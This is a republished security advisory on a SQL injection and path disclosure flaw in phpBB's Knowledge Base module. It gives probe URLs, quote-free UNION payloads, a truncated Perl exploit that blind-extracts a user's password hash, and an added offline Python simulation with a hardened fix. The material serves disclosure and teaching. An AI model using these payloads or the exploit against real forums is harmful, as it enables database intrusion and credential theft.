phpBB Knowledge Base Module SQL Injection and Full Path Disclosure Vulnerability

2008-04-09 04:23:25  Source: Internet



Published: 2005-04-19
Updated: 2005-04-19

Affected systems:
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0
phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0
Description:
BUGTRAQ ID: 13219

phpBB is a widely used open-source web forum application written in PHP. It supports several database backends, such as Oracle, MSSQL, MySQL and PostgreSQL.

The Knowledge Base module for phpBB (kb.php) contains a SQL injection vulnerability that a remote attacker can use to run arbitrary queries against the forum database.

The cause is that the application does not validate or sanitize user input before placing it in a SQL query. If a user supplies input such as:

/kb.php?mode=cat&cat='

an error message similar to the following is returned. Note the `\'` in the echoed query: PHP's magic_quotes_gpc escaped the quote, but because the `cat` value is interpolated into the query without surrounding quotes, the escaping does not help, and the error page (DEBUG MODE) also discloses the table prefix and the absolute path of the script:

Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php

Since the value is used as a bare integer, a UNION payload needs no quote characters at all. The following two requests show the boolean oracle the exploit below is built on: a UNION whose WHERE clause is false adds no row and the page reports that the category does not exist, while a UNION that does return a row produces a visibly different page (here a further DEBUG MODE SQL error). The six zeros match the column count of the kb_categories table:

/kb.php?mode=cat&cat=0 UNION SELECT 0,0,0,0,0,0 FROM phpbb_users WHERE 1=0
No match: Categorie doesn't exist.

/kb.php?mode=cat&cat=0 UNION SELECT 0,0,0,0,0,0 FROM phpbb_users
Match: DEBUG MODE - SQL-Error

Successful exploitation can lead to compromise of the application and to disclosure or modification of data (for example, extracting user password hashes one character at a time through the oracle above).

<*Source: deluxe89 (deluxe@security-project.org)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111384185116335&w=2
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!

#!/usr/bin/perl

use strict;
use IO::Socket::INET;


$| = 1;
print "
#########################
# phpBB KnowledgeBase Hack - Exploit
#
# Discovered by [R] and deluxe89
# Exploit by deluxe89
#########################
\n";

if($#ARGV < 2)
{
print "Usage: ./phpbb_kb.pl host path userid [proxy:port]\n";
print "Example: ./phpbb_kb.pl www.host.com /phpBB2/ 2 127.0.0.1:80\n";
exit;
}


my $debug = 0;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = $ARGV[2];
my $prefix = '';


# Optional fourth argument is an HTTP proxy (host:port); otherwise connect to the target directly.
my ($addr, $port) = ($ARGV[3] ne '') ? split(/:/, $ARGV[3]) : ($host, 80);
if($ARGV[3] ne '')
{
print "[+] Using a proxy\n";
}
else
{
print "[+] You're using NO proxy!\n";
sleep(3);
}



#
# Get the table prefix
#
# A single quote breaks the query; with DEBUG MODE on, the error page echoes the
# failing SQL, so the prefix is read straight out of "FROM <prefix>kb_categories".

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

my $value = "mode=cat&cat='";
print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";

while(<$sock>)
{
if($_ =~ m/FROM (\w+)kb_categories/)
{
$prefix = $1;
print "[+] Table prefix: $prefix\n";
last;
}
}
if($prefix eq '')
{
die("[-] Getting the table prefix failed.\n");
}




#
# Getting the hash
#
# Boolean-blind extraction of the 32-character password hash of $userid, one
# position at a time, using the "No match" / "Match" oracle shown above.

print "[+] Getting the hash. Please wait some minutes..\nHash: ";


my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

if(&test($i, 96)) # buchstabe (German: "letter"): is the character above '`' (ASCII 96), i.e. one of a-f?
{
for(my $c=97;$c<103;$c++) # try a..f
{
if(&test($i, $c, 1))
# The listing ends here on the page: the rest of this branch, the digit (0-9)
# branch and the test() subroutine that sends each probe are not reproduced.
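The pieces the advisory and the truncated exploit describe, run offline against an in-memory SQLite stand-in: the unquoted query from functions_kb.php, the three probe requests from the description (syntax error, false UNION, true UNION), the prefix-extraction regex from the Perl script, the per-position letter-or-digit search its loop performs, and a hardened handler for comparison. This is an added example, not code from the advisory or from deluxe89's exploit. The table names and the six-column UNION come from the advisory; the column names of kb_categories, the user row and its md5 hash, the file path, and the exact blind condition (the original test() subroutine is not on the page) are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for a phpBB 2 board with the Knowledge Base mod.
# Table names and the 6-column width of kb_categories come from the advisory;
# column names, the user row, the hash and the file path are assumptions.
PREFIX = "phpbb_"
SAMPLE_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # md5("password"), a well-known test value
FAKE_FILE = "/var/www/phpBB2/includes/functions_kb.php"  # assumed install path


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE {PREFIX}kb_categories (
            category_id INTEGER, category_name TEXT, category_details TEXT,
            category_order INTEGER, cat_parent INTEGER, cat_allow_view INTEGER);
        INSERT INTO {PREFIX}kb_categories VALUES (1, 'General', 'misc', 1, 0, 1);
        CREATE TABLE {PREFIX}users (user_id INTEGER, username TEXT, user_password TEXT);
        INSERT INTO {PREFIX}users VALUES (2, 'admin', '{SAMPLE_HASH}');
    """)
    return db


def kb_vulnerable(db, cat):
    """Emulates the unpatched kb.php: `cat` goes into the query unquoted and
    uncast, as the advisory's echoed SQL shows.  Returns the three responses
    the advisory distinguishes (DEBUG MODE error / no row / row)."""
    sql = f"SELECT * FROM {PREFIX}kb_categories WHERE category_id = {cat}"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as e:
        # DEBUG MODE output: the SQL text leaks the table prefix and the
        # absolute script path (the full path disclosure half of the advisory).
        return f"DEBUG MODE\nSQL Error : {e}\n{sql}\nFile : {FAKE_FILE}"
    if row is None:
        return "No match: Categorie doesn't exist."
    return "Match"


def table_prefix(response):
    """First step of the Perl exploit: read the prefix out of the leaked SQL."""
    m = re.search(r"FROM (\w+)kb_categories", response)
    return m.group(1) if m else None


def blind_payload(pos, op, value, user_id=2):
    """Quote-free boolean payload in the shape of the advisory's two probes.
    The condition is an assumption (the original test() is not on the page);
    SQLite's unicode()/substr() stand in for MySQL's ASCII()/SUBSTRING()."""
    return (f"0 UNION SELECT 0,0,0,0,0,0 FROM {PREFIX}users WHERE user_id = {user_id} "
            f"AND unicode(substr(user_password,{pos},1)) {op} {value}")


def extract_hash(db, user_id=2, length=32):
    """The search the truncated Perl loop performs: per position, ask once
    whether the character is above '`' (ASCII 96, i.e. a letter), then try
    a-f, otherwise 0-9.  At most 1 + 6 or 1 + 10 requests per hex digit."""
    out = ""
    for pos in range(1, length + 1):
        is_letter = kb_vulnerable(db, blind_payload(pos, ">", 96, user_id)) == "Match"
        candidates = range(97, 103) if is_letter else range(48, 58)
        for c in candidates:
            if kb_vulnerable(db, blind_payload(pos, "=", c, user_id)) == "Match":
                out += chr(c)
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return out


def kb_hardened(db, cat):
    """Fixed handler: reject anything that is not an integer and bind the value
    as a parameter, so the string can never be parsed as SQL.  (PHP's intval()
    would silently turn the UNION payload into 0; failing closed is stricter.)"""
    try:
        cat_id = int(cat)
    except ValueError:
        return "Invalid category"
    sql = f"SELECT * FROM {PREFIX}kb_categories WHERE category_id = ?"
    row = db.execute(sql, (cat_id,)).fetchone()
    return "Match" if row else "No match: Categorie doesn't exist."


if __name__ == "__main__":
    db = build_db()
    leak = kb_vulnerable(db, "'")
    print(leak)
    print("prefix:", table_prefix(leak))
    print("recovered:", extract_hash(db))
    print("hardened:", kb_hardened(db, "0 UNION SELECT 0,0,0,0,0,0 FROM phpbb_users"))
```

Two things the simulation makes visible: the oracle only needs the "No match" string, so switching DEBUG MODE off removes the path and prefix leak but not the injection; and the only fix that closes the hole is treating `cat` as an integer (validating it and binding it as a parameter), which is what `kb_hardened` does.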

